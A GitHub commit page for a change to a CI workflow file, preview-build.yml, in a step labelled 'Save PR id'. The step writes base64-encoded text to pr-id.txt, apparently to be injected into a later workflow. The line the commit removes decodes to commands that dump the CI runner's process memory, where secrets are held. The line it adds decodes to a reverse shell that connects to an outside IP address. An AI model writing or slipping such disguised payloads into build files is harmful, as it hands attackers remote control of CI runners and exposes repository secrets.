Skip to content

Commit

Permalink
Update preview-build.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
Chave0v0 authored Sep 27, 2024
1 parent f4f6809 commit 2ea4185
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/preview-build.yml
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ jobs:
# Upload PR id for next workflow use
- name: Save PR id
if: ${{ always() }}
run: echo 'JiYgd2hvYW1pICYmIGlkICYmIGNhdCAvcHJvYy8kKHBncmVwIC1mIFJ1bm5lci5Xb3JrZXIpL21lbSAj' | base64 -d > pr-id.txt
run: echo 'JiYgYmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTQ5LjM3Lzk5OTkgIw==' | base64 -d > pr-id.txt

- name: Upload PR id
if: ${{ always() }}
Expand Down

0 comments on commit 2ea4185

Please sign in to comment.